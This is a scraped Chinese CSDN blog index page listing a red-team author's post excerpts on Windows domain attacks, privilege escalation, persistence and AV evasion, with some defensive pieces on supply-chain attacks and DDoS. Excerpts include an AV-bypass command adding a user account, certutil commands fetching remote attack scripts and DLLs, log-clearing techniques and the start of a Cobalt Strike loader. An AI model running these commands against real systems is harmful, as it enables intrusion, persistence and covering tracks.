自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Shanfenglan's blog

尽人事听天命

  • 博客(118)
  • 资源 (8)
  • 收藏
  • 关注

原创 日常杂记专用

1.echo命令会覆盖之前文件里面的东西

2020-12-04 17:06:05 48557 1

原创 公司财报参数理解与行业理解

行业相关电子行业:长期看好,制造业才是未来,不过现在整体估值偏高,几乎接近上个最高点。白酒行业:估值非常高,但是业绩也非常好,可以慢慢定投。新能源行业:发展不错,快接近上一个高点,但是有国家政策在扶持,可以持有一部分赌一把。半导体行业:广发高端制造里面含有一部分,暂时不想入手,风险太大,以后看政策再说。消费行业:非周期性行业,股价回调约百分之二十,可以买一部分。医疗行业:大盘向上它向下,已经清仓,等主力进入的时候我们可以进入。化工行业:利润不错,上流行业,混合基金里面含有这个板块。军工:周期

2020-11-23 18:19:00 48062 1

原创 绕过杀毒软件添加账号

文章目录1.使用CS绕过拦截2.使用vbs文件3.参考文章1.使用CS使用CS直接用shell添加会被拦截。绕过拦截使用argue命令来伪装命令的参数,然后使用run来执行,逻辑是:以挂起状态启动匹配的进程(使用伪参数)使用实参更新进程内存恢复进程效果如下,且没有被拦截:argue net saldjfoiwjeofijoisfklasjdlfjasdfiowjefoijwoefjoaisjefojsaefoiwejfowefrun net user asdf 123 /add

2021-01-14 17:30:11 35

原创 供应链攻击的检测与防御

文章目录1.什么是供应链攻击2.什么情况下有可能会受到供应链攻击3.如何防御供应链攻击1.建立内部软件源或使用足够安全的软件源2.终端安全检测主动扫描总结参考1.什么是供应链攻击供应链的公司被入侵更改了产品的源码,用户下载了供应链公司的产品而最终受到攻击。这种用户被攻击的方式称为供应链攻击。举例如下:1.Jeilyfish在PyPI社区出现了一个名为Jeilyfish的包,它与Jellyfish只有一个字母不同。如果下载者不注意的话可能会下载到恶意的Jeilfish包然后被窃取敏感信息。2.什么

2021-01-14 16:20:17 34 1

原创 如何建设企业入侵防御体系

文章目录维度如何制定安全策略总结参考文章维度对于防守方来说,可以针对公司的整个系统架构,在不同的维度采取响应的防守策略,攻击者一般都是通过低维度进行攻击一步一步到达高维度的,比如先寻找业务逻辑找到上传点,然后根据不同的平台制作不同的webshell文件,拿到shell后再利用系统的漏洞进行提权等,一步一步由浅入深。作为防守方,制定完善的安全策略是必行之路,但如何制定安全策略是一个见仁见智的事情。借鉴xti9er的一句话,基于系统的机制、CGI和协议规范较为有效,比不断用新规则新策略去为之前的策略打“

2021-01-12 17:08:07 28

原创 DDos防护的演变

文章目录0.前言1.最早期人工防护2.利用检测系统与流量清洗设备3.全自动化设备4.防护对抗思路参考文章0.前言论持久战——带你走进腾讯DDoS防护体系的读后总结。1.最早期人工防护此时检测与防护可能都是人工的,当管理员发现计算机被攻击后开始联系技术人员,让技术人员过来做iptables进行流量过滤。如下图:iptables解决问题简单粗暴,但也容易把正常用户拦截在外,总的来说就是不够灵活,但在初期确实是解决DDos问题的一大手段。不过随着时间的推移,机房的机器越来越多,单单靠iptables

2021-01-12 15:51:01 14

原创 初探DDos

文章目录1. 前言2. 什么是DDos3. 死亡之ping补充:CC攻击4. DDos攻击的分类4.1.Flood型DDos攻击4.2.反射型DDos攻击4.3.协议层面的攻击补充:云业务相关的DDos攻击的解决方案5. DDos攻击涉及到的业务6.总结7.参考文章1. 前言刚接触网络安全行业就听到过DDos这个词汇但是没有深入了解过,今天看了别人的文章,对DDos有了一点点自己的理解,于是写下这篇文章做一个记录。2. 什么是DDos全名是分布式拒绝服务攻击(Distributed Denial o

2021-01-11 17:45:17 11163

原创 子域名收集方法总结

文章目录1. 通过nmap1.1 通过svr进行子域名收集1.2 通过域传送收集子域名2. 利用证书透明度收集子域3. 公网的公开数据4. 利用威胁情报平台数据收集子域5. 利用googlehacking6. 利用工具查询7. 参考文章1. 通过nmap1.1 通过svr进行子域名收集原理:通过枚举常见的SRV记录并做查询来收集子域srv,以及通过查询域名的DNS记录中的MX,NS,SOA,TXT记录来收集子域。SRV记录: 添加服务记录服务器服务记录时会添加此项,SRV记录了哪台计算机提供了哪

2021-01-07 10:34:12 12045

原创 web安全学习-起步

文章目录参考文章参考文章Bypass一些命令注入限制的姿势Bypass disabled_functions一些思路总结XSS总结浅析Redis中SSRF的利用

2021-01-06 10:48:20 11994

原创 利用主机账户的aes256结合委派攻击来进行权限维持

文章目录1. 前言2. 实现1.配置了敏感账户不可被委派的效果2.绕过3. 参考文章1. 前言主机账户的hash一般不会被改变,我们可以保留其aes256的hash然后可以结合委派攻击来进行权限维持,但当高权限用户例如admin被配置成了敏感账户的话,一般是不能进行委派的,我们今天讨论的主题就是绕过这种配置并利用。2. 实现1.配置了敏感账户不可被委派的效果先将域控账户administrator设置为不可委派:Rubeus.exe hash /user:evilsystem /password

2021-01-05 16:21:04 11945

原创 windows九大权限的分析与利用

文章目录1.前言2.常见的权限集合可被进一步利用的权限3.补充:权限的状态到底有什么意义4.利用4.1 SeImpersonatePrivilege4.2 SeAssignPrimaryPrivilege4.3 SeTcbPrivilege4.4 SeBackupPrivilege4.5 SeRestorePrivilege4.6 SeCreateTokenPrivilege4.7 SeLoadDriverPrivilege4.8 SeTakeOwnershipPrivilege4.9 SeDebugPri

2020-12-30 16:32:24 23098

原创 通过token窃取实现降权或者提权

文章目录前言通过msf实现1.生成木马并以管理员权限运行2.实现提权到system3.降级到普通用户通过incognito工具实现1. 实现提权到system2. 降权到普通user获取TrustedInstaller权限参考文章前言windows中token有两种:Delegation token(授权令牌):用于交互会话登录,例如远程桌面Impersonation token(模拟令牌):用于非交互登录,例如dir远程主机的文c$当我们拿到一台主机却不知道如何提权的时候,可以看看是否有高权

2020-12-29 17:51:38 32240

原创 windows文件执行记录的获取与清除

文章目录前言日志查看1. 进程创建记录2.Program Inventory Event Log3.Program-Telemetry Event Log4.查询特定类别日志日志删除1.删除全部的某类日志2.逐条删除日志2.1 导出Security2.2批量删除指定条目的日志2.3 还原evtx文件绕过windows的日志记录功能参考文章前言本文主要介绍了如何利用命令行来获取或者清除文件执行记录等日志。对日志的删除需要在管理员权限下才可以,图形化界面查看日志的命令为eventvwr。日志查看1. 进

2020-12-29 15:58:56 32238 1

原创 从administrator到system权限的几种方式

文章目录前言1. 通过sc命令(只适用于win xp)2. 通过计划任务命令(win7-win10)2.1 通过at命令实现(只适用于win7)2.2 通过schtasks实现(win7-win10)3. 通过psexec4. Meterpreter参考文章前言对windows中从admin到system权限到方法做一个小的记录。主要参考了三好学生的博客,三好学生博客地址。以下利用方式的前提是已经获取了计算机的administrator权限。1. 通过sc命令(只适用于win xp)以syste

2020-12-28 15:46:44 33969

原创 赋予域内普通用户dcsync权限来变向权限维持

文章目录前言利用过程防御方法前言DCsync是几个权限的集合体,如果普通用户想具有DCsync权限,可以给对象添加以下三条ACE:DS-Replication-Get-Changes,对应GUID为:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2DS-Replication-Get-Changes-All,对应GUID为:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2DS-Replication-Get-Changes-In-Filtered-S

2020-12-25 16:40:18 41637 1

原创 C#类型的CS木马Loader

1. 前言先做记录,后续有时间给代码进行添加注释。2. 代码段using System;using System.Runtime.InteropServices;#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")namespace TCPMeterpreterProcess{ class Program { static void Main(string[] ar

2020-12-24 15:54:48 20306 2

原创 SIDHistory属性的利用

文章目录1. 前言2.对某用户的SIDHistory属性进行操作2.1 查询zhangsan的SIDHistory2.2 给zhangsan用户添加域管的sid2.3 删除zhangsan的SIDHistory属性3.利用思路3.1 权限维持3.2 利用当前用户的sidhistory属性防御方法1. 前言SIDHistory属性的存在是为了解决用户在迁移到另一个域中的时候权限会改变的问题。例如用户zhangsan在A域中本来是管理员,迁移到B域的时候因为sid的改变有可能会变成普通用户权限,这时候如果给

2020-12-24 11:20:51 45093 1

原创 利用AdminSDHolder进行权限维持

文章目录前言利用思路参考文章前言AdminSDHolder可以理解成是域内很多个组的集合体,如果一个用户能完全控制AdminSDHolder,那么它就能同时控制域内的许多组,AdminSDHolder内部的组如下:AdministratorsDomain AdminsAccount OperatorsBackup OperatorsDomain ControllersEnterprise AdminsPrint OperatorsReplicatorRead-only Domain

2020-12-23 18:08:58 45109

原创 SeEnableDelegationPrivilege权限的利用

文章目录1. 前言2. SeEnableDelegationPrivilege权限的拥有者是谁?1. 通过powerview2. 通过GPO3.通过UserRights(只在域控上执行有效)3. 如何给其他用户配置SeEnableDelegationPrivilege权限4.如何利用拥有SeEnableDelegationPrivilege权限的普通用户参考文章1. 前言SeEnableDelegationPrivilege权限的作用是配置约束性委派。拥有SeEnableDelegationPrivil

2020-12-23 16:43:00 45083

原创 基于windows中委派的攻击思路(下)-基于资源的约束性委派

文章目录1. 前言2. 技术点2.1 利用原理:那么如何获得一个机器账户呢?如何获得一个有权利修改msDS-AllowedToActOnBehalfOfOtherIdentity?3. 利用过程:1. 利用powermad添加机器账户:2. 查询添加的机器账户的sid3. 修改msDS-AllowedToActOnBehalfOfOtherIdentity:3.1 win server 2012以上:3.2 win server 2012以下:4. 利用rubues获取票据5.利用impacket1. 前

2020-12-16 12:21:33 36907

原创 基于windows中委派的攻击思路(上)-约束性委派与非约束性委派

1.前言委派是域中的一种安全设置,可以允许某个机器上的服务代表某个用户去执行某个操作,主要分为三种:非约束性委派约束性委派基于资源的约束性委派这篇文章主要对这三种委派方式相关的攻击方式进行总结。关于委派的其他细节理解可以参看windows中关于委派(delegation)的理解。2.发现具有委派关系的用户和计算机原理:当服务账号或者主机被设置为非约束性委派时,其userAccountControl属性会包含TRUSTED_FOR_DELEGATION当服务账号或者主机被设置为约束性

2020-12-10 18:36:44 45386

原创 宏观看红蓝对抗与渗透测试

参考文章浅谈大规模红蓝对抗攻与防红蓝对抗之域名搜集方法总结网络空间安全时代的红蓝对抗建设源头之战,不断升级的攻防对抗技术 —— 软件供应链攻击防御探索以攻促防:企业蓝军建设思考红蓝对抗之Windows内网渗透...

2020-12-10 12:21:21 40210 1

原创 利用telemetry进行权限维持

文章目录利用条件达成效果利用过程原理防御手法利用条件本地管理员权限(绕过UAC)有Compatelrunner命令系统版本:2008R2/Windows 7 through 2019/Windows 10达成效果每天以system权限执行一次后门文件利用过程下载利用脚本到主机上并执行,下列为脚本用法:ABUSING WINDOWS TELEMETRY FOR PERSISTENCE.ImanfengFeatures:Install: - Deployment autho

2020-12-10 11:54:29 45495 1

原创 LDAP简述与相关攻击手法

文章目录1. 前言2. LDAP为什么会存在?2.1 目录服务2.2 LDAP解决了什么问题3. LDAP到底是什么4. LDAP部分细节5. AD与LDAP的关系6.思考7.参考文章1. 前言LDAP是我经常听到的词汇,但一直没有对其进行系统但学习,现在专门写一篇文章记录对其对理解。2. LDAP为什么会存在?我们首先得理解LDAP这个东西为什么会存在,这时候就有一个概念出现了,它就是目录服务。2.1 目录服务在局域网中为了方便主机管理,一般使用DHCP分配IP地址给局域网内的各个资产来方便定

2020-12-07 17:35:56 47432 1

原创 红蓝对抗-反制

CATALOG1.前言2.1.前言初次接触反制技术,写一个文档作为记录。2.

2020-12-02 17:50:49 62939

原创 利用DSRM账号进行权限维持

CATALOG1.前言2.原理3.实现3.1 更改DSRM明文密码3.2 利用域内其他用户的hash去同步DSRM的密码4.防御方法参考文章1.前言今天看了内网加固方面的知识,发现了一个加固方案是针对DSRM攻击的,于是就查了一下什么是DSRM攻击,因此有了这篇文章。2.原理域控上有个账户,名字为目录服务还原模式账户又名DSRM账户,它的密码是安装DC的时候设置的,一般不会修改。但是当DSRM账户被修改的时候,域控的本地管理员administrator账户密码的hash也会被修改,并且与DSRM账户

2020-11-26 16:39:34 68358 1

原创 对msf生成的elf文件进行一次简单的逆向分析

CATALOG1.前言2.需要的工具3.开始调试参考文章1.前言从没接触过这个技术点,今天刚好有机会接触,所以写一篇文章做个记录。2.需要的工具gdb使用apt-get install gdb即可下载。peda为了弥补gdb不显示寄存器的缺陷所以要使用这个工具,在gdb安装好后执行下面的命令:git clone https://github.com/longld/peda.git ~/pedaecho "source ~/peda/peda.py" >> ~/.gdbini

2020-11-25 15:02:34 68781 1

原创 msf的getsystem命令原理与windows命名管道

CATALOG1.前言2.windows命名管道3.msf中getsystem原理4.参考文章1.前言之前已经写过了winodws命名管道相关的知识,在我的由psexec远控的实现原理到windows命名管道这篇文章中,最近复习的时候又看到了,同时对其有了新的理解,进而又想起了msf中getsystem的原理发现两者刚好有所关联,于是有了这篇文章。2.windows命名管道首先我们需要明确的一点,命名管道基于smb协议通信,smb,smb。重要的事情说三遍。它是用来让两个进程间进行通信的,这两个进

2020-11-23 17:20:03 74993 1

原创 win10从administrator提权到system(更改父进程的pid)

前言看到一篇博客讲的一个powershell脚本,下载利用后确实可以成功,特作记录。实现脚本下载certutil -urlcache -split -f https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1在windows下启动一个administrator权限的powershell. .\psgetsys.ps1[MyProcess]::CreateProcessFromParent(64

2020-11-19 16:02:36 83102 1

原创 烂土豆(JuicyPotato)提权

CATALOG1.前言2.原理2.1前置知识2.2juicypotato实现流程3.实现3.1提权结果3.2实现步骤3.2.1先使用powershell脚本找到可用的CLSID3.2.2再使用bat文件确定能利用的CLSID3.2.3使用juicypotato进行利用4.防御方法5.参考文章1.前言很有名的一个提权工具,今天对其做一个小小的使用总结。2.原理2.1前置知识首先我们要知道:使用DCOM的时候,如果以服务方式远程连接,那么为system权限,例如BITS服务。使用DCOM可以通过

2020-11-18 16:50:53 84167 1

原创 对tcp三次握手四次挥手的一点小理解

CATALOG1.前言2.三次握手3.四次挥手4.参考文章1.前言网络通信的实体是不同主机之间进程的通信,也就是端到端通信,其过程借助于TCP或者UDP协议,基于端口。倘若利用TCP协议,则传输前有三次握手,传输后有三次挥手,是一个可靠传输。倘若利用UDP协议,传输前不需要建立连接,对方收到后也不需要发送确认,是一个不可靠的传输,但是胜在消耗资源少,速度快。2.三次握手首先我们需要知道为什么要三次握手而不是两次。原因是为了防止之前传输过的请求连接的数据包延时到达服务器后,服务器再次创建新的连接而

2020-11-18 12:12:50 85730

原创 win7提权system与后门

CATALOG前言操作过程1.利用wlbsctrl.dll提权2.利用TSMSISrv.dll和TSVIPSrv.dll提权3.实现后门查考文章前言今天看了一篇文章,发现文章中的利用方法只能在win7上使用,无法在win10上使用,特做记录。操作过程1.利用wlbsctrl.dll提权IKEEXT(IKE and AuthIP IPsec Keying Modules)服务在启动时会加载wlbsctrl.dll,但Windows系统默认配置下该dll不存在,如果我们将自己的dll放在这个位置,在服

2020-11-17 17:51:45 86724

原创 利用DCOM实现远程命令执行

CATALOG1.前言2.实现过程2.1通过DCOM在本机执行命令2.2通过DCOM控制远程主机执行命令3.参考文章1.前言实现命令执行的方式之前我写过文章来总结,前两天又发现了一个新方法DCOM,于是有了这篇文章。2.实现过程2.1通过DCOM在本机执行命令实现条件:管理员权限的powershell查找DCOM组件MMC Application Class如下图,命令为Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplic

2020-11-17 11:53:22 90911

原创 劫持outlook与IE浏览器实现权限维持

CATALOG1.实现原理2.实现过程劫持IE浏览器劫持outlook3.参考文章1.实现原理通过劫持IE浏览器或者outlook启动过程中启动的com组件,来使系统执行我们所指定的dll文件,进而达到权限维持,可以通过修改注册表来完成,不需要管理员权限。2.实现过程劫持IE浏览器下载poc文件:certutil.exe -urlcache -split -f https://github.com/3gstudent/test/blob/master/calcmutex.dll创建文件夹如

2020-11-16 18:21:24 92801 1

原创 拿到域管权限后的域内网络拓扑

CATALOG1.前言2.实现本机使用dnscmd进行远程查询2.1 获取拥有admin$共享权限的shell2.2 获取admin$共享后的操作2.3获取dns记录3.使用域控的shell进行查询3.1使用工具获取域控的shell3.2执行命令进行查询4.参考文章1.前言拿到域管权限后我们除了做权限维持之外还需要对域内的网络情况进行探索,这篇文章就这项技能做一个概述。2.实现本机使用dnscmd进行远程查询首先我们需要利用域管凭据获得admin$共享,或者直接获得域控机器的shell。2.1 获

2020-11-13 17:34:56 99292 1

原创 利用dnscmd在DNS服务器上实现远程加载Dll

CATALOG1.前言2.实现过程3.对抗方式4.参考文章1.前言这是一种渗透技巧,并不能算是漏洞。优势:不用执行psexec等远控程序,利用方式偏冷门。劣势:对权限要求比较苛刻(要能够修改sysvol下script文件夹的权限)2.实现过程3.对抗方式4.参考文章域渗透——利用dnscmd在DNS服务器上实现远程加载Dll...

2020-11-13 16:16:04 97442 1

原创 基于office三件套的一次性权限维持

CATALOG前言利用过程防御方法参考文章前言windows电脑中大多数都安装了office三件套,利用其进行权限维持一般效果会不错。利用过程下载powershell脚本到本地。利用脚本下载地址如果是32位的office则需要对脚本进行一点修改,将正确的路径填入其中,如下图,我更改的是对word做后门对时候的路径:然后生成32位的dll文件,并将其转化为base64编码形式,将值放在calcwllx86中即可。然后将这个powershell文件放到受害者电脑上执行命令WordWLL即可生成后门

2020-11-12 17:37:22 98834

原创 通过劫持explorer.exe的dll文件来实现权限维持

CATALOG前言操作过程对抗方法参考文章前言这是一种主动的后门触发方式,只要对方主机重启机器的操作,就会触发我们之前设置的dll。系统在启动时默认启动进程explorer.exe,如果劫持了COM对象MruPidlList,就能劫持进程explorer.exe,实现后门随系统开机启动,相当于是主动后门。而劫持MruPidlList劫持注册表中的一个{42aedc87-2188-41fd-b9a3-0c966feabec1}CLSID,将其的键值换成恶意dll即可。操作过程更改注册表劫持MruPi

2020-11-12 15:52:01 100864

原创 linux进程隐藏与对抗

CATALOG前言实现方法1.命令替换实现方法对抗方法2.Hook系统调用实现方法:对抗方法:3.利用mount命令进行挂载实现方法对抗方法前言这篇文章主要做一个技术点的记录,过去接触比较少,现在对其进行一个小结。实现方法1.命令替换实现方法替换top、ps等命令对抗方法使用stat命令查看文件状态并且使用md5sum命令查看文件hash并将其与正常文件hash进行比较。如果确定被替换,使用正常文件替代坏文件即可。2.Hook系统调用比如说ps这个命令:原理:(1)调用opena

2020-11-12 11:34:44 99932 2

原创 使用xwizard命令加载dll

CATALOG前言实现第一步:生成恶意dll文件第二步:移动xwizard.exe第三步:利用防御方法参考文章前言一种新的加载dll的方式,不会触发uac。实现第一步:生成恶意dll文件首先使用msfvenom生成一个dll文件。msfvenom -p windows/x64/meterpreter/reverse_http LPORT=9090 LHOST=172.16.250.1 -f dll > xwizards.dll第二步:移动xwizard.exe我是将c:\window

2020-11-11 16:55:56 100976 1

一个好用的密码本好用好用

一个常用的爆破所用的密码本一个常用的爆破所用的密码本一个常用的爆破所用的密码本一个常用的爆破所用的密码本

2020-08-09

nishang-master.zip

powershell 网络攻防

2020-08-27

impacket.zip

impacket工具包,渗透神器

2020-08-27

Dll(IAT).exe

dll劫持需要的软件dlldll劫持需要的软件dlldll劫持需要的软件dlldll劫持需要的软件dll

2020-08-09

myccl特征码修改工具

myccl特征码修改工具,安全无毒,仅供学习使用myccl特征码修改工具,安全无毒,仅供学习使用myccl特征码修改工具,安全无毒,仅供学习使用myccl特征码修改工具,安全无毒,仅供学习使用

2020-08-09

mimikatz_trunk.zip

破解windows密码

2020-08-27

CS4.1.无毒绿色自用

CS4.1.无毒

2020-08-09

CobaltStrike4.0用户手册_中文翻译.pdf

cs4.0中文手册,方便英文不太好的朋友阅读。里面讲的很详细,仔细看看会对自己的技术有很大的提升,内容涵盖好几个方面,是一个值得去读的手册,免费分享给大家,技术无界限。

2020-08-02

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除